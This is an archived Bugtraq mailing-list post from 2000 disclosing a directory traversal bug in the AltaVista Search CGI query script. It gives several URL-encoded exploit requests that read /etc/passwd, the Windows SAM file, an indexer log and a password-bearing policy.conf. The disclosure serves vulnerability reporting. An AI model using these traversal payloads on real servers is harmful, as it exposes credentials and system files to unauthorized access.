 |
|
|
|
Altavista followup
Altavista followup
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Date: Вс, 09 янв 2000 10:37:04
От: rudi carell <rudicarell@HOTMAIL.COM>
Кому: BUGTRAQ@SECURITYFOCUS.COM
Тема: Altavista followup
--------------------------------------------------------------------------------
hola,
more bugs in the AV-Search thing ..
using uri-encoded strings it is possible to view "any" file on the system ..
examples:
unixxxsss ...
http://server:[port]/cgi-
bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
or on an micro$oft IIS ...
http://server:[port]/cgi-
bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._
interesting infos about the file structure ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.
log
or another file which does contain the password ..
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.
conf
altavista told me that this is(was) just a flavour of the "old" bug and its
fix is(was) included in the last secpatch.
whatever ....
nicedays :-/
RC
rudicarell@hotmail.com
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
|
|
|
|
|
|
|
|
